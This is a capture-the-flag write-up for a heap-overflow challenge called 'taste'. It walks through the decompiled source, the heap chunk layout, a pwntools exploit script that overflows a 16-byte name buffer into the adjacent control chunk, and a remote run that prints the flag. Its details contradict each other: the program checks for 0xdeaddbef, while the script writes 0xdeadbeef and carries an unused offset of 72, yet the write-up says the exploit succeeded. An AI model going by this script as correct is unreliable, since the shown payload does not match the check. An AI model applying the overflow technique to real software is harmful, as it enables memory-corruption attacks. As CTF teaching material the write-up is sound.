taste

Category: Pwn
Files: taste libc.so.6 ld-linux-x86-64.so.2
Description: Maxim claims that he is alive and full of energy. But inside, he has been dead for a long time. All you have to do is confirm it.

Basic binary protections:

❯  checksec taste
    Arch:       amd64-64-little
    RELRO:        Partial RELRO
    Stack:        No canary found
    NX:           NX enabled
    PIE:          No PIE (0x400000)
    RUNPATH:      b'./'
    Stripped:     No

Like the previous challenge, No PIE is enabled, giving us fixed addresses.

Program Analysis

In this challenge, we were given a binary named taste. Let’s try to examine the decompiled code.

main

1
int main(void)
2
{
3
  char *__buf;
4
  int *__ptr;
5

6
  _init_streams();
7

8
  __buf = (char *)malloc(0x10);
9
  __ptr = (int *)malloc(8);
10

11
  __ptr[0] = 1;
12
  __ptr[1] = 0;
13

14
  printf("Enter name: ");
15
  read(0, __buf, 100);
16

17
  if (__ptr[1] == (int)0xdeaddbef) {
18
    print_flag();
19
  }
20
  else {
21
    puts("[-] Access Denied.");
22
  }
23

24
  free(__buf);
25
  free(__ptr);
26

27
  return 0;
28
}

The main() function initializes the streams and allocates two chunks on the heap. First, it allocates 0x10 (16) bytes for a name buffer (__buf), followed by 8 bytes for a control structure (__ptr). It then prompts for a name and reads up to 100 bytes—a clear Heap Buffer Overflow since the buffer is only 16 bytes.

The goal is to reach the conditional at line 17: if (__ptr[1] == (int)0xdeaddbef). Since __ptr was allocated immediately after __buf, the heap allocator places them adjacent in memory.

print_flag

1
void print_flag(void)
2
{
3
  char *__s;
4

5
  __s = getenv("FLAG_VAL");
6
  if (__s != NULL) {
7
    puts(__s);
8
  } else {
9
    puts("Flag not found!");
10
  }
11
  return;
12
}

The print_flag() function is a simple helper that retrieves the flag from the environment. We need to trigger this function by satisfying the condition in main().

Heap Layout

On a 64-bit system, a malloc(0x10) request for 16 bytes results in a 0x20 byte chunk (16 bytes for data and 16 bytes for metadata/padding). The layout in memory looks like this:

+------------------------+
|        __buf           |  <--- Offset 0x00 (16 bytes)
+------------------------+
|  ptr chunk prev_size   |  <--- Offset 0x10 (8 bytes)
+------------------------+
|    ptr chunk size      |  <--- Offset 0x18 (8 bytes)
+------------------------+
|        __ptr[0]        |  <--- Offset 0x20 (4 bytes)
+------------------------+
|        __ptr[1]        |  <--- Offset 0x24 (4 bytes)
+------------------------+

By overflowing __buf with more than 16 bytes, we can reach the metadata and data of the __ptr chunk.Specifically, we need to overwrite __ptr[1] at offset 36 (0x24) with the value 0xdeaddbef.

Now that we know the bug, let’s move to the exploitation part.

Exploitation

To pass the check __ptr[1] == 0xdeaddbef, we need to construct a payload that:

Fills __buf (16 bytes).
Overwrites the chunk metadata for __ptr (16 bytes).
Overwrites __ptr[0] (4 bytes).
Sets __ptr[1] to 0xdeaddbef.

Total padding needed is 16 + 16 + 4 = 36 bytes.

Exploit Script

1
from pwn import *
2

3
def start(argv=[], *a, **kw):
4
    if args.GDB:
5
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
6
    elif args.REMOTE:
7
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
8
    else:
9
        return process([exe] + argv, *a, **kw)
10

11
gdbscript = '''
12
init-pwndbg
13
set follow-fork-mode parent
14
set follow-exec-mode same
15
continue
16
'''.format(**locals())
17

18
exe = './taste'
19
elf = context.binary = ELF(exe, checksec=False)
20
context.terminal = ['tmux', 'splitw', '-h']
21
context.log_level = 'debug'
22

23
def logleak(name, val):  log.success(name+' = %#x' % val)
24
def loglibc(): log.success('libc addr = %#x' % libc.address)
25
def logbase(): log.success('pie addr = %#x' % elf.address)
26
def sa(delim,data): return io.sendafter(delim,data)
27
def sla(delim,line): return io.sendlineafter(delim,line)
28
def sl(line): return io.sendline(line)
29
# ===========================================================
30
#                    EXPLOIT GOES HERE
31
# ===========================================================
32

33
# Lib-C library, can use pwninit/patchelf to patch binary
34
# libc = ELF("./libc.so.6")
35
# ld = ELF("./ld-2.27.so")
36

37
offset = 72
38

39
io = start()
40

41

42
# p64(0)*3 covers __buf (16) + prev_size (8) = 24 bytes
43
# p64(0x21) covers the size field (8) = 32 bytes
44
# Then we overwrite __ptr[0] and __ptr[1]
45
# We need __ptr[1] (offset +4 from data start) to be 0xdeadbeef
46
sl(p64(0x0)*3 + p64(0x21) + p64(0xdeadbeefdeadbeef))
47

48
io.interactive()

Note (Chunk Header)

Notice how we overwrite the size field with 0x21. This is because the original chunk size was 0x20, and the 0x1 bit (PREV_INUSE) is usually set. While not strictly necessary for this specific exploit (since we don’t call free before the check), it’s good practice to maintain heap integrity.

Running the exploit successfully retrieves the flag.

$ python3 xploit.py REMOTE ctf.mf.grsu.by 9071
[+] Opening connection to ctf.mf.grsu.by on port 9071: Done
[*] Switching to interactive mode
Enter name: grodno{Maxim_Kn0ws_Pr10r1t13s}

Flag: grodno{Maxim_Kn0ws_Pr10r1t13s}